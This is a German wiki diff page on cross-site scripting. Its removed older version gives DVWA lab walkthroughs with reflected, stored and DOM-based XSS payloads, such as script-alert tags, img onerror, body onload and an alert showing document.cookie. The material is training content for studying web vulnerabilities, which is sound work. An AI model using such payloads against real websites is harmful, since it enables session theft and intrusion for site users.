Cross-Site-Scripting Beispiele: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(6 dazwischenliegende Versionen desselben Benutzers werden nicht angezeigt)
Zeile 1: Zeile 1:
 
+
*[[Cross-Site-Scripting "Reflected" Beispiele]]
=Original Artikel=
+
*[[Cross-Site-Scripting "Persistentes" Beispiele]]
*https://tanmay26.medium.com/cross-site-scripting-xss-dvwa-damn-vulnerable-web-applications-36808bff37b3
+
*[[Cross-Site-Scripting "DOM-basiertes" Beispiele]]
 
 
 
 
=Cross-Site-Scripting (XSS)=
 
*Technik, bei der Angreifer bösartige Skripte in eine Zielwebsite einschleusen
 
*Es kann ihnen die Zugriffskontrolle auf die Website ermöglichen.
 
*Gefahr besteht,wenn Benutzern die Eingabe von Daten Felder ohne Kontrollen ermöglicht wird.
 
*Ein Angreifer kann dann auch ein Skript mit schädlichem Code einfügen.
 
 
 
=ARTEN VON XSS=
 
*Reflektiertes XSS
 
*Gespeichertes XSS
 
*Dom-Basis XSS
 
 
 
=Reflected XSS (Cross-Site-Scripting): RXSS=
 
*In diesem Fall werden keine Hackerdaten auf der Website gespeichert.
 
*Der Code wird nur auf der Opferseite ausgeführt.
 
*Hacker sendet ein Eingabeskript dieser Website, das dann an den Browser des Opfers reflektiert wird
 
*Der Hacker lässt dann schädlichen JavaScript-Payload ausführen.
 
 
 
==DVWA Low Level Reflected XSS==
 
===Firefox===
 
Payload: <script>alert("xss")</script>
 
[[Datei:Xss-1.png|400px]]
 
===Chromium===
 
;Erzeugte Link
 
*http://opfer:82/vulnerabilities/xss_r/?name=+%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E#
 
==DVWA High Level Reflected XSS==
 
===Chromium===
 
Payload: <img src=x onerror=alert("xinux")>
 
[[Datei:Xss-3.png|400px]]
 
===Firefox===
 
;Erzeugte Link
 
*http://opfer:82/vulnerabilities/xss_r/?name=%3Cimg+src%3Dx+onerror%3Dalert%28%22xinux%22%29%3E#
 
 
 
=Stored XSS (Cross site scripting):SXSS=
 
Gespeichertes Cross-Site-Scripting (XSS) In diesem Fall wird der Hacker-Schadcode auf der Zielwebsite und dem Webserver gespeichert. wenn ein Angreifer bösartiges JavaScript in die Website senden kann und dieses Skript auf den Computern anderer Benutzer ausgeführt wird, das (XSS) Cross-Site-Scripting gespeichert wird
 
==DVWA Low Level Stored XSS==
 
===Firefox===
 
Payload: <script>alert(document.domain)</script>
 
[[Datei:Xss-4.png|400px]]
 
===Chromium===
 
;Erzeugter Link
 
*http://opfer:82/vulnerabilities/xss_s/
 
==DVWA Medium Level Stored XSS==
 
===Firefox===
 
Payload : <img src=x onerror=alert(document.domain)>
 
 
 
===DVWA High Level Stored XSS===
 
Payload : <body onload=alert("bingo")>
 
 
 
=DOM BASE XSS=
 
 
 
Der Cross-Site-Scripting-Angriff auf Dom Base (XSS) ist ein Kurzform-Dokumentobjektmodell-basiertes Cross-Site-Scripting. Das heißt, die HTTP-Antwort der Seite selbst ändert sich nicht. Ein Angreifer kann mehrere DOM-Objekte verwenden, um einen Cross-Site-Scripting-Angriff zu erstellen. Die beliebtesten Objekte aus dieser Perspektive sind document.URL, document.location und document.referrer.
 
 
 
;DVWA low level DOM XSS:
 
Payload: <nowiki>https://dvwa.willux.de/vulnerabilities/xss_d/?default=<script>alert("xinux 1")</script></nowiki>
 
 
 
[[Datei:Xss-7.png|400px]]
 
 
 
;DVWA Medium level DOM BASE:
 
Payload: <nowiki>https://dvwa.willux.de/vulnerabilities/xss_d/?default=English#<script>alert("xinux 2")</script></nowiki>
 
;and reload your browser.
 
 
 
[[Datei:Xss-8.png|400px]]
 
 
 
 
 
;DVWA HIGH LEVEL DOM BASE:
 
Payload: <nowiki>https://dvwa.willux.de/vulnerabilities/xss_d/?default=English#<script>alert(document.cookie)</script></nowiki>
 
;and reload browser.
 
 
 
[[Datei:Xss-9.png|400px]]
 
 
 
=Reference=
 
https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A7-Cross-Site_Scripting_(XSS).html
 
https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content/part2/xss.html
 

Aktuelle Version vom 7. März 2023, 08:51 Uhr

Abgerufen von „http://wiki.ixheim.de/index.php?title=Cross-Site-Scripting_Beispiele&oldid=42781